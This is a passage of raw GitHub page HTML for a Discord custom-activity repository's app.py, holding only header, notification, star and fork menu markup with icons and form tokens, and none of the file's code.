data-ga-click="Header, go to notifications, icon:read" data-target="notification-indicator.link"> <span class="mail-status " data-target="notification-indicator.modifier"></span> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-bell"> <path d="M8 16a2 2 0 001.985-1.75c.017-.137-.097-.25-.235-.25h-3.5c-.138 0-.252.113-.235.25A2 2 0 008 16z"></path><path fill-rule="evenodd" d="M8 1.5A3.5 3.5 0 004.5 5v2.947c0 .346-.102.683-.294.97l-1.703 2.556a.018.018 0 00-.003.01l.001.006c0 .002.002.004.004.006a.017.017 0 00.006.004l.007.001h10.964l.007-.001a.016.016 0 00.006-.004.016.016 0 00.004-.006l.001-.007a.017.017 0 00-.003-.01l-1.703-2.554a1.75 1.75 0 01-.294-.97V5A3.5 3.5 0 008 1.5zM3 5a5 5 0 0110 0v2.947c0 .05.015.098.042.139l1.703 2.555A1.518 1.518 0 0113.482 13H2.518a1.518 1.518 0 01-1.263-2.36l1.703-2.554A.25.25 0 003 7.947V5z"></path> </svg> </a> </notification-indicator> </div> <div class="Header-item position-relative d-none d-md-flex"> <details class="details-overlay details-reset"> <summary class="Header-link" aria-label="Create new…" data-hydro-click="{&quot;event_type&quot;:&quot;analytics.event&quot;,&quot;payload&quot;:{&quot;category&quot;:&quot;Header&quot;,&quot;action&quot;:&quot;create new&quot;,&quot;label&quot;:&quot;icon:add&quot;,&quot;originating_url&quot;:&quot;https://github.com/agambajwa/discord-custom-activity/blob/master/app.py&quot;,&quot;user_id&quot;:91737103}}" data-hydro-click-hmac="5f5a09b269e7a6c9f60268558c0cd09e2184078ca0e24ebb6b686a24fac0dc94" > <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-plus"> <path fill-rule="evenodd" d="M7.75 2a.75.75 0 01.75.75V7h4.25a.75.75 0 110 1.5H8.5v4.25a.75.75 0 11-1.5 0V8.5H2.75a.75.75 0 010-1.5H7V2.75A.75.75 0 017.75 2z"></path> </svg> <span class="dropdown-caret"></span> </summary> <details-menu class="dropdown-menu dropdown-menu-sw"> <a 
role="menuitem" class="dropdown-item" href="/new" data-ga-click="Header, create new repository"> New repository </a> <a role="menuitem" class="dropdown-item" href="/new/import" data-ga-click="Header, import a repository"> Import repository </a> <a role="menuitem" class="dropdown-item" href="https://gist.github.com/" data-ga-click="Header, create new gist"> New gist </a> <a role="menuitem" class="dropdown-item" href="/organizations/new" data-ga-click="Header, create new organization"> New organization </a> </details-menu> </details> </div> <div class="Header-item position-relative mr-0 d-none d-md-flex"> <details class="details-overlay details-reset js-feature-preview-indicator-container" data-feature-preview-indicator-src="/users/Bomzz06/feature_preview/indicator_check"> <summary class="Header-link" aria-label="View profile and more" data-hydro-click="{&quot;event_type&quot;:&quot;analytics.event&quot;,&quot;payload&quot;:{&quot;category&quot;:&quot;Header&quot;,&quot;action&quot;:&quot;show menu&quot;,&quot;label&quot;:&quot;icon:avatar&quot;,&quot;originating_url&quot;:&quot;https://github.com/agambajwa/discord-custom-activity/blob/master/app.py&quot;,&quot;user_id&quot;:91737103}}" data-hydro-click-hmac="28010ab2db5d0607297200310a6b073105d38e1e90c184d9c408d3e208df889e" > <img src="https://avatars.githubusercontent.com/u/91737103?s=40&amp;v=4" alt="@Bomzz06" size="20" height="20" width="20" data-view-component="true" class="avatar-user avatar avatar-small"></img> <span class="feature-preview-indicator js-feature-preview-indicator" style="top: 1px;" hidden></span> <span class="dropdown-caret"></span> </summary> <details-menu class="dropdown-menu dropdown-menu-sw" style="width: 180px" src="/users/91737103/menu" preload> <include-fragment> <p class="text-center mt-3" data-hide-on-error> <svg style="box-sizing: content-box; color: var(--color-icon-primary);" width="32" height="32" viewBox="0 0 16 16" fill="none" data-view-component="true" class="anim-rotate"> <circle 
cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /> </svg> </p> <p class="ml-1 mb-2 mt-2 color-text-primary" data-show-on-error> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert"> <path fill-rule="evenodd" d="M8.22 1.754a.25.25 0 00-.44 0L1.698 13.132a.25.25 0 00.22.368h12.164a.25.25 0 00.22-.368L8.22 1.754zm-1.763-.707c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0114.082 15H1.918a1.75 1.75 0 01-1.543-2.575L6.457 1.047zM9 11a1 1 0 11-2 0 1 1 0 012 0zm-.25-5.25a.75.75 0 00-1.5 0v2.5a.75.75 0 001.5 0v-2.5z"></path> </svg> Sorry, something went wrong. </p> </include-fragment> </details-menu> </details> </div> </header> </div> <div id="start-of-content" class="show-on-focus"></div> <div data-pjax-replace id="js-flash-container"> <template class="js-flash-template"> <div class="flash flash-full {{ className }}"> <div class=" px-2" > <button class="flash-close js-flash-close" type="button" aria-label="Dismiss this message"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path fill-rule="evenodd" d="M3.72 3.72a.75.75 0 011.06 0L8 6.94l3.22-3.22a.75.75 0 111.06 1.06L9.06 8l3.22 3.22a.75.75 0 11-1.06 1.06L8 9.06l-3.22 3.22a.75.75 0 01-1.06-1.06L6.94 8 3.72 4.78a.75.75 0 010-1.06z"></path> </svg> </button> <div>{{ message }}</div> </div> </div> </template> </div> <include-fragment class="js-notification-shelf-include-fragment" data-base-src="https://github.com/notifications/beta/shelf"></include-fragment> <div class="application-main " data-commit-hovercards-enabled data-discussion-hovercards-enabled data-issue-and-pr-hovercards-enabled > <div itemscope 
itemtype="http://schema.org/SoftwareSourceCode" class=""> <main id="js-repo-pjax-container" data-pjax-container > <div id="repository-container-header" class="hx_page-header-bg pt-3 hide-full-screen mb-5" data-pjax-replace> <div class="d-flex mb-3 px-3 px-md-4 px-lg-5"> <div class="flex-auto min-width-0 width-fit mr-3"> <h1 class=" d-flex flex-wrap flex-items-center wb-break-word f3 text-normal"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo color-icon-secondary mr-2"> <path fill-rule="evenodd" d="M2 2.5A2.5 2.5 0 014.5 0h8.75a.75.75 0 01.75.75v12.5a.75.75 0 01-.75.75h-2.5a.75.75 0 110-1.5h1.75v-2h-8a1 1 0 00-.714 1.7.75.75 0 01-1.072 1.05A2.495 2.495 0 012 11.5v-9zm10.5-1V9h-8c-.356 0-.694.074-1 .208V2.5a1 1 0 011-1h8zM5 12.25v3.25a.25.25 0 00.4.2l1.45-1.087a.25.25 0 01.3 0L8.6 15.7a.25.25 0 00.4-.2v-3.25a.25.25 0 00-.25-.25h-3.5a.25.25 0 00-.25.25z"></path> </svg> <span class="author flex-self-stretch" itemprop="author"> <a class="url fn" rel="author" data-hovercard-type="user" data-hovercard-url="/users/agambajwa/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="/agambajwa">agambajwa</a> </span> <span class="mx-1 flex-self-stretch color-text-secondary">/</span> <strong itemprop="name" class="mr-2 flex-self-stretch"> <a data-pjax="#js-repo-pjax-container" href="/agambajwa/discord-custom-activity">discord-custom-activity</a> </strong> <span></span><span class="Label Label--secondary v-align-middle mr-1">Public</span> </h1> </div> <ul class="pagehead-actions flex-shrink-0 d-none d-md-inline" style="padding: 2px 0;"> <li> <notifications-list-subscription-form class="f5 position-relative d-flex"> <details class="details-reset details-overlay f5 position-relative" data-target="notifications-list-subscription-form.details" data-action="toggle:notifications-list-subscription-form#detailsToggled" > <summary class="btn btn-sm 
rounded-right-0" data-hydro-click="{&quot;event_type&quot;:&quot;repository.click&quot;,&quot;payload&quot;:{&quot;target&quot;:&quot;WATCH_BUTTON&quot;,&quot;repository_id&quot;:298526344,&quot;originating_url&quot;:&quot;https://github.com/agambajwa/discord-custom-activity/blob/master/app.py&quot;,&quot;user_id&quot;:91737103}}" data-hydro-click-hmac="0fb560a2317ad347e2cbc363b6cb6c00bf2246de638afe04d1f19de85667d64c" data-ga-click="Repository, click Watch settings, action:blob#show" aria-label="Notifications settings"> <span data-menu-button> <span hidden data-target="notifications-list-subscription-form.unwatchButtonCopy" > <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-eye"> <path fill-rule="evenodd" d="M1.679 7.932c.412-.621 1.242-1.75 2.366-2.717C5.175 4.242 6.527 3.5 8 3.5c1.473 0 2.824.742 3.955 1.715 1.124.967 1.954 2.096 2.366 2.717a.119.119 0 010 .136c-.412.621-1.242 1.75-2.366 2.717C10.825 11.758 9.473 12.5 8 12.5c-1.473 0-2.824-.742-3.955-1.715C2.92 9.818 2.09 8.69 1.679 8.068a.119.119 0 010-.136zM8 2c-1.981 0-3.67.992-4.933 2.078C1.797 5.169.88 6.423.43 7.1a1.619 1.619 0 000 1.798c.45.678 1.367 1.932 2.637 3.024C4.329 13.008 6.019 14 8 14c1.981 0 3.67-.992 4.933-2.078 1.27-1.091 2.187-2.345 2.637-3.023a1.619 1.619 0 000-1.798c-.45-.678-1.367-1.932-2.637-3.023C11.671 2.992 9.981 2 8 2zm0 8a2 2 0 100-4 2 2 0 000 4z"></path> </svg> Unwatch </span> <span hidden data-target="notifications-list-subscription-form.stopIgnoringButtonCopy" > <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-bell-slash"> <path fill-rule="evenodd" d="M8 1.5c-.997 0-1.895.416-2.534 1.086A.75.75 0 014.38 1.55 5 5 0 0113 5v2.373a.75.75 0 01-1.5 0V5A3.5 3.5 0 008 1.5zM4.182 4.31L1.19 2.143a.75.75 0 10-.88 1.214L3 5.305v2.642a.25.25 0 01-.042.139L1.255 10.64A1.518 1.518 0 002.518 13h11.108l1.184.857a.75.75 0 
10.88-1.214l-1.375-.996a1.196 1.196 0 00-.013-.01L4.198 4.321a.733.733 0 00-.016-.011zm7.373 7.19L4.5 6.391v1.556c0 .346-.102.683-.294.97l-1.703 2.556a.018.018 0 00-.003.01.015.015 0 00.005.012.017.017 0 00.006.004l.007.001h9.037zM8 16a2 2 0 001.985-1.75c.017-.137-.097-.25-.235-.25h-3.5c-.138 0-.252.113-.235.25A2 2 0 008 16z"></path> </svg> Stop ignoring </span> <span data-target="notifications-list-subscription-form.watchButtonCopy" > <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-eye"> <path fill-rule="evenodd" d="M1.679 7.932c.412-.621 1.242-1.75 2.366-2.717C5.175 4.242 6.527 3.5 8 3.5c1.473 0 2.824.742 3.955 1.715 1.124.967 1.954 2.096 2.366 2.717a.119.119 0 010 .136c-.412.621-1.242 1.75-2.366 2.717C10.825 11.758 9.473 12.5 8 12.5c-1.473 0-2.824-.742-3.955-1.715C2.92 9.818 2.09 8.69 1.679 8.068a.119.119 0 010-.136zM8 2c-1.981 0-3.67.992-4.933 2.078C1.797 5.169.88 6.423.43 7.1a1.619 1.619 0 000 1.798c.45.678 1.367 1.932 2.637 3.024C4.329 13.008 6.019 14 8 14c1.981 0 3.67-.992 4.933-2.078 1.27-1.091 2.187-2.345 2.637-3.023a1.619 1.619 0 000-1.798c-.45-.678-1.367-1.932-2.637-3.023C11.671 2.992 9.981 2 8 2zm0 8a2 2 0 100-4 2 2 0 000 4z"></path> </svg> Watch </span> </span> <span class="dropdown-caret"></span> </summary> <details-menu class="SelectMenu " role="menu" data-target="notifications-list-subscription-form.menu" > <div class="SelectMenu-modal notifications-component-menu-modal"> <header class="SelectMenu-header"> <h3 class="SelectMenu-title">Notifications</h3> <button class="SelectMenu-closeButton" type="button" aria-label="Close menu" data-action="click:notifications-list-subscription-form#closeMenu"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path fill-rule="evenodd" d="M3.72 3.72a.75.75 0 011.06 0L8 6.94l3.22-3.22a.75.75 0 111.06 1.06L9.06 8l3.22 3.22a.75.75 0 11-1.06 1.06L8 
9.06l-3.22 3.22a.75.75 0 01-1.06-1.06L6.94 8 3.72 4.78a.75.75 0 010-1.06z"></path> </svg> </button> </header> <div class="SelectMenu-list"> <form data-target="notifications-list-subscription-form.form" data-action="submit:notifications-list-subscription-form#submitForm" action="/notifications/subscribe" accept-charset="UTF-8" method="post"><input type="hidden" name="authenticity_token" value="3ZqUffXIzoqG5w2XIHAesd3nzNWGsbYI14zeB/aLcycZrWVHDOzMus5mw4ZYgydJy3bl9mjcHNRNkIxbtVYSrA==" autocomplete="off" /> <input type="hidden" name="repository_id" value="298526344"> <button type="submit" name="do" value="included" class="SelectMenu-item flex-items-start" role="menuitemradio" aria-checked="true" data-targets="notifications-list-subscription-form.subscriptionButtons" > <span class="f5"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check SelectMenu-icon SelectMenu-icon--check"> <path fill-rule="evenodd" d="M13.78 4.22a.75.75 0 010 1.06l-7.25 7.25a.75.75 0 01-1.06 0L2.22 9.28a.75.75 0 011.06-1.06L6 10.94l6.72-6.72a.75.75 0 011.06 0z"></path> </svg> </span> <div> <div class="f5 text-bold"> Participating and @mentions </div> <div class="text-small color-text-secondary text-normal pb-1"> Only receive notifications from this repository when participating or @mentioned. 
</div> </div> </button> <button type="submit" name="do" value="subscribed" class="SelectMenu-item flex-items-start" role="menuitemradio" aria-checked="false" data-targets="notifications-list-subscription-form.subscriptionButtons" > <span class="f5"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check SelectMenu-icon SelectMenu-icon--check"> <path fill-rule="evenodd" d="M13.78 4.22a.75.75 0 010 1.06l-7.25 7.25a.75.75 0 01-1.06 0L2.22 9.28a.75.75 0 011.06-1.06L6 10.94l6.72-6.72a.75.75 0 011.06 0z"></path> </svg> </span> <div> <div class="f5 text-bold"> All Activity </div> <div class="text-small color-text-secondary text-normal pb-1"> Notified of all notifications on this repository. </div> </div> </button> <button type="submit" name="do" value="ignore" class="SelectMenu-item flex-items-start" role="menuitemradio" aria-checked="false" data-targets="notifications-list-subscription-form.subscriptionButtons" > <span class="f5"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check SelectMenu-icon SelectMenu-icon--check"> <path fill-rule="evenodd" d="M13.78 4.22a.75.75 0 010 1.06l-7.25 7.25a.75.75 0 01-1.06 0L2.22 9.28a.75.75 0 011.06-1.06L6 10.94l6.72-6.72a.75.75 0 011.06 0z"></path> </svg> </span> <div> <div class="f5 text-bold"> Ignore </div> <div class="text-small color-text-secondary text-normal pb-1"> Never be notified. 
</div> </div> </button> </form> <button class="SelectMenu-item flex-items-start pr-3" type="button" role="menuitemradio" data-target="notifications-list-subscription-form.customButton" data-action="click:notifications-list-subscription-form#openCustomDialog" aria-haspopup="true" aria-checked="false" > <span class="f5"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check SelectMenu-icon SelectMenu-icon--check"> <path fill-rule="evenodd" d="M13.78 4.22a.75.75 0 010 1.06l-7.25 7.25a.75.75 0 01-1.06 0L2.22 9.28a.75.75 0 011.06-1.06L6 10.94l6.72-6.72a.75.75 0 011.06 0z"></path> </svg> </span> <div> <div class="d-flex flex-items-start flex-justify-between"> <div class="f5 text-bold">Custom</div> <div class="f5 pr-1"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-arrow-right"> <path fill-rule="evenodd" d="M8.22 2.97a.75.75 0 011.06 0l4.25 4.25a.75.75 0 010 1.06l-4.25 4.25a.75.75 0 01-1.06-1.06l2.97-2.97H3.75a.75.75 0 010-1.5h7.44L8.22 4.03a.75.75 0 010-1.06z"></path> </svg> </div> </div> <div class="text-small color-text-secondary text-normal pb-1"> Select events you want to be notified of in addition to participating and @mentions. 
</div> </div> </button> <div class="px-3 py-2 d-flex color-bg-secondary flex-items-center"> <span class="f5"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-device-mobile SelectMenu-icon SelectMenu-icon--device-mobile"> <path fill-rule="evenodd" d="M3.75 0A1.75 1.75 0 002 1.75v12.5c0 .966.784 1.75 1.75 1.75h8.5A1.75 1.75 0 0014 14.25V1.75A1.75 1.75 0 0012.25 0h-8.5zM3.5 1.75a.25.25 0 01.25-.25h8.5a.25.25 0 01.25.25v12.5a.25.25 0 01-.25.25h-8.5a.25.25 0 01-.25-.25V1.75zM8 13a1 1 0 100-2 1 1 0 000 2z"></path> </svg> </span> <span className="text-small color-text-secondary text-normal pb-1"> Get push notifications on <a target="_blank" rel="noopener noreferrer" href="https://apps.apple.com/app/apple-store/id1477376905?ct=watch-dropdown&amp;mt=8&amp;pt=524675">iOS</a> or <a target="_blank" rel="noopener noreferrer" href="https://play.google.com/store/apps/details?id=com.github.android&amp;referrer=utm_campaign%3Dwatch-dropdown%26utm_medium%3Dweb%26utm_source%3Dgithub">Android</a>. 
</span> </div> </div> </div> </details-menu> <details-dialog class="notifications-component-dialog " data-target="notifications-list-subscription-form.customDialog" hidden> <div class="SelectMenu-modal notifications-component-dialog-modal overflow-visible"> <form data-target="notifications-list-subscription-form.customform" data-action="submit:notifications-list-subscription-form#submitCustomForm" action="/notifications/subscribe" accept-charset="UTF-8" method="post"><input type="hidden" name="authenticity_token" value="B5KeWY/J7AWLIwERLJheXkUJmk2gzdVgu6NQMebrvkjDpW9jdu3uNcOizwBUa2emU5izbk6gf7whvwJtpTbfww==" autocomplete="off" /> <input type="hidden" name="repository_id" value="298526344"> <header class="d-sm-none SelectMenu-header pb-0 border-bottom-0 px-2 px-sm-3"> <h1 class="f3 SelectMenu-title d-inline-flex"> <button class="color-bg-primary border-0 px-2 py-0 m-0 Link--secondary f5" aria-label="Return to menu" type="button" data-action="click:notifications-list-subscription-form#closeCustomDialog" > <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-arrow-left"> <path fill-rule="evenodd" d="M7.78 12.53a.75.75 0 01-1.06 0L2.47 8.28a.75.75 0 010-1.06l4.25-4.25a.75.75 0 011.06 1.06L4.81 7h7.44a.75.75 0 010 1.5H4.81l2.97 2.97a.75.75 0 010 1.06z"></path> </svg> </button> Custom </h1> </header> <header class="d-none d-sm-flex flex-items-start pt-1"> <button class="border-0 px-2 pt-1 m-0 Link--secondary f5" style="background-color: transparent;" aria-label="Return to menu" type="button" data-action="click:notifications-list-subscription-form#closeCustomDialog" > <svg style="position: relative; left: 2px; top: 1px" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-arrow-left"> <path fill-rule="evenodd" d="M7.78 12.53a.75.75 0 01-1.06 0L2.47 8.28a.75.75 0 010-1.06l4.25-4.25a.75.75 0 011.06 1.06L4.81 7h7.44a.75.75 0 
010 1.5H4.81l2.97 2.97a.75.75 0 010 1.06z"></path> </svg> </button> <h1 class="pt-1 pr-4 pb-0 pl-0 f5 text-bold"> Custom </h1> </header> <fieldset> <legend> <div class="text-small color-text-secondary pt-0 pr-3 pb-3 pl-6 pl-sm-5 border-bottom mb-3"> Select events you want to be notified of in addition to participating and @mentions. </div> </legend> <div class="form-checkbox mr-3 ml-6 ml-sm-5 mb-2 mt-0"> <label class="f5 text-normal"> <input type="checkbox" name="thread_types[]" value="Issue" data-targets="notifications-list-subscription-form.threadTypeCheckboxes" data-action="change:notifications-list-subscription-form#threadTypeCheckboxesUpdated" > Issues </label> </div> <div class="form-checkbox mr-3 ml-6 ml-sm-5 mb-2 mt-0"> <label class="f5 text-normal"> <input type="checkbox" name="thread_types[]" value="PullRequest" data-targets="notifications-list-subscription-form.threadTypeCheckboxes" data-action="change:notifications-list-subscription-form#threadTypeCheckboxesUpdated" > Pull requests </label> </div> <div class="form-checkbox mr-3 ml-6 ml-sm-5 mb-2 mt-0"> <label class="f5 text-normal"> <input type="checkbox" name="thread_types[]" value="Release" data-targets="notifications-list-subscription-form.threadTypeCheckboxes" data-action="change:notifications-list-subscription-form#threadTypeCheckboxesUpdated" > Releases </label> </div> <div class="form-checkbox mr-3 ml-6 ml-sm-5 mb-2 mt-0"> <label class="f5 text-normal"> <input type="checkbox" name="thread_types[]" value="Discussion" data-targets="notifications-list-subscription-form.threadTypeCheckboxes" data-action="change:notifications-list-subscription-form#threadTypeCheckboxesUpdated" > Discussions </label> <span class="tooltipped tooltipped-nw mr-2 p-1 float-right" aria-label="Discussions are not enabled for this repo"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-info color-icon-secondary"> <path fill-rule="evenodd" d="M8 
1.5a6.5 6.5 0 100 13 6.5 6.5 0 000-13zM0 8a8 8 0 1116 0A8 8 0 010 8zm6.5-.25A.75.75 0 017.25 7h1a.75.75 0 01.75.75v2.75h.25a.75.75 0 010 1.5h-2a.75.75 0 010-1.5h.25v-2h-.25a.75.75 0 01-.75-.75zM8 6a1 1 0 100-2 1 1 0 000 2z"></path> </svg> </span> </div> <div class="form-checkbox mr-3 ml-6 ml-sm-5 mb-2 mt-0"> <label class="f5 text-normal"> <input type="checkbox" name="thread_types[]" value="SecurityAlert" data-targets="notifications-list-subscription-form.threadTypeCheckboxes" data-action="change:notifications-list-subscription-form#threadTypeCheckboxesUpdated" > Security alerts </label> </div> </fieldset> <div class="pt-2 pb-3 px-3 d-flex flex-justify-start flex-row-reverse"> <button type="submit" name="do" value="custom" class="btn btn-sm btn-primary ml-2" data-target="notifications-list-subscription-form.customSubmit" disabled >Apply</button> <button data-action="click:notifications-list-subscription-form#resetForm" data-close-dialog="" type="button" data-view-component="true" class="btn-sm btn"> Cancel </button> </div> </form> </div> </details-dialog> <div class="notifications-component-dialog-overlay"></div> </details> <a class="social-count" href="/agambajwa/discord-custom-activity/watchers" aria-label="1 user is watching this repository" data-target="notifications-list-subscription-form.socialCount" > 1 </a> </notifications-list-subscription-form> </li> <li> <div class="d-block js-toggler-container js-social-container starring-container "> <form class="starred js-social-form" action="/agambajwa/discord-custom-activity/unstar" accept-charset="UTF-8" method="post"><input type="hidden" name="authenticity_token" value="aDCHwYWaKLqsiSpgtNmgiE7iFJLWTNM0XuVEDy07yVMAH8JGuspOc2NzboCj53rrQUivnEYrO1vElQnYTWLEfA==" autocomplete="off" /> <input type="hidden" name="context" value="repository"> <button type="submit" class="btn btn-sm btn-with-count js-toggler-target" aria-label="Unstar this repository" title="Unstar agambajwa/discord-custom-activity" 
data-hydro-click="{&quot;event_type&quot;:&quot;repository.click&quot;,&quot;payload&quot;:{&quot;target&quot;:&quot;UNSTAR_BUTTON&quot;,&quot;repository_id&quot;:298526344,&quot;originating_url&quot;:&quot;https://github.com/agambajwa/discord-custom-activity/blob/master/app.py&quot;,&quot;user_id&quot;:91737103}}" data-hydro-click-hmac="26b99205bc3675fed3a1976bc898e3bc2cf139c2bf84883a16c605f8312c2605" data-ga-click="Repository, click unstar button, action:blob#show; text:Unstar"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-star-fill mr-1"> <path fill-rule="evenodd" d="M8 .25a.75.75 0 01.673.418l1.882 3.815 4.21.612a.75.75 0 01.416 1.279l-3.046 2.97.719 4.192a.75.75 0 01-1.088.791L8 12.347l-3.766 1.98a.75.75 0 01-1.088-.79l.72-4.194L.818 6.374a.75.75 0 01.416-1.28l4.21-.611L7.327.668A.75.75 0 018 .25z"></path> </svg> <span data-view-component="true"> Unstar </span></button> <a class="social-count js-social-count" href="/agambajwa/discord-custom-activity/stargazers" aria-label="2 users starred this repository"> 2 </a> </form> <form class="unstarred js-social-form" action="/agambajwa/discord-custom-activity/star" accept-charset="UTF-8" method="post"><input type="hidden" name="authenticity_token" value="WoX2iMic/750KwGaNF8YrDLWLPEQJnCPcPCz4SryCz67Y7zkkhN7pPCZ5FbCK6VDYEedSzBa9QWGpe4R8A4A4g==" autocomplete="off" /> <input type="hidden" name="context" value="repository"> <button type="submit" class="btn btn-sm btn-with-count js-toggler-target" aria-label="Star this repository" title="Star agambajwa/discord-custom-activity" data-hydro-click="{&quot;event_type&quot;:&quot;repository.click&quot;,&quot;payload&quot;:{&quot;target&quot;:&quot;STAR_BUTTON&quot;,&quot;repository_id&quot;:298526344,&quot;originating_url&quot;:&quot;https://github.com/agambajwa/discord-custom-activity/blob/master/app.py&quot;,&quot;user_id&quot;:91737103}}" 
data-hydro-click-hmac="6091699887b522ca30716b30e93c3c8d1789a533a28ac89051279995fc6c1426" data-ga-click="Repository, click star button, action:blob#show; text:Star"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-star mr-1"> <path fill-rule="evenodd" d="M8 .25a.75.75 0 01.673.418l1.882 3.815 4.21.612a.75.75 0 01.416 1.279l-3.046 2.97.719 4.192a.75.75 0 01-1.088.791L8 12.347l-3.766 1.98a.75.75 0 01-1.088-.79l.72-4.194L.818 6.374a.75.75 0 01.416-1.28l4.21-.611L7.327.668A.75.75 0 018 .25zm0 2.445L6.615 5.5a.75.75 0 01-.564.41l-3.097.45 2.24 2.184a.75.75 0 01.216.664l-.528 3.084 2.769-1.456a.75.75 0 01.698 0l2.77 1.456-.53-3.084a.75.75 0 01.216-.664l2.24-2.183-3.096-.45a.75.75 0 01-.564-.41L8 2.694v.001z"></path> </svg> <span data-view-component="true"> Star </span></button> <a class="social-count js-social-count" href="/agambajwa/discord-custom-activity/stargazers" aria-label="2 users starred this repository"> 2 </a> </form> </div> </li> <li> <!-- '"` --><!-- </textarea></xmp> --></option></form><form class="btn-with-count" action="/agambajwa/discord-custom-activity/fork" accept-charset="UTF-8" method="post"><input type="hidden" name="authenticity_token" value="LG1tFKmIMavvvvfRBm0nTg7LfURRXhS1QlnyAmllPMXfqoHfrOevppdpK/WxXJQNgPSh+giRgFOOJpHKp2CARw==" /> <button class="btn btn-sm btn-with-count" data-hydro-click="{&quot;event_type&quot;:&quot;repository.click&quot;,&quot;payload&quot;:{&quot;target&quot;:&quot;FORK_BUTTON&quot;,&quot;repository_id&quot;:298526344,&quot;originating_url&quot;:&quot;https://github.com/agambajwa/discord-custom-activity/blob/master/app.py&quot;,&quot;user_id&quot;:91737103}}" data-hydro-click-hmac="2ba6ea3d9c8e61dc4d6567d82e92d7c83e88483a640612fef5c5ac71c19d1eef" data-ga-click="Repository, show fork modal, action:blob#show; text:Fork" type="submit" title="Fork your own copy of agambajwa/discord-custom-activity to your account" aria-label="Fork your own copy of 
agambajwa/discord-custom-activity to your account"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo-forked"> <path fill-rule="evenodd" d="M5 3.25a.75.75 0 11-1.5 0 .75.75 0 011.5 0zm0 2.122a2.25 2.25 0 10-1.5 0v.878A2.25 2.25 0 005.75 8.5h1.5v2.128a2.251 2.251 0 101.5 0V8.5h1.5a2.25 2.25 0 002.25-2.25v-.878a2.25 2.25 0 10-1.5 0v.878a.75.75 0 01-.75.75h-4.5A.75.75 0 015 6.25v-.878zm3.75 7.378a.75.75 0 11-1.5 0 .75.75 0 011.5 0zm3-8.75a.75.75 0 100-1.5.75.75 0 000 1.5z"></path> </svg> Fork </button></form> <a href="/agambajwa/discord-custom-activity/network/members" class="social-count" aria-label="0 users forked this repository"> 0 </a> </li> </ul> </div> <div id="responsive-meta-container" data-pjax-replace> </div> <nav data-pjax="#js-repo-pjax-container" aria-label="Repository" data-view-component="true" class="js-repo-nav js-sidenav-container-pjax js-responsive-underlinenav overflow-hidden UnderlineNav px-3 px-md-4 px-lg-5"> <ul data-view-component="true" class="UnderlineNav-body list-style-none"> <li data-view-component="true" class="d-inline-flex"> <a id="code-tab" href="/agambajwa/discord-custom-activity" data-tab-item="i0code-tab" data-selected-links="repo_source repo_downloads repo_commits repo_releases repo_tags repo_branches repo_packages repo_deployments /agambajwa/discord-custom-activity" data-hotkey="g c" data-ga-click="Repository, Navigation click, Code tab" data-pjax="#repo-content-pjax-container" aria-current="page" data-view-component="true" class="UnderlineNav-item hx_underlinenav-item no-wrap js-responsive-underlinenav-item js-selected-navigation-item selected"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-code UnderlineNav-octicon d-none d-sm-inline"> <path fill-rule="evenodd" d="M4.72 3.22a.75.75 0 011.06 1.06L2.06 8l3.72 3.72a.75.75 0 11-1.06 1.06L.47 8.53a.75.75 0 
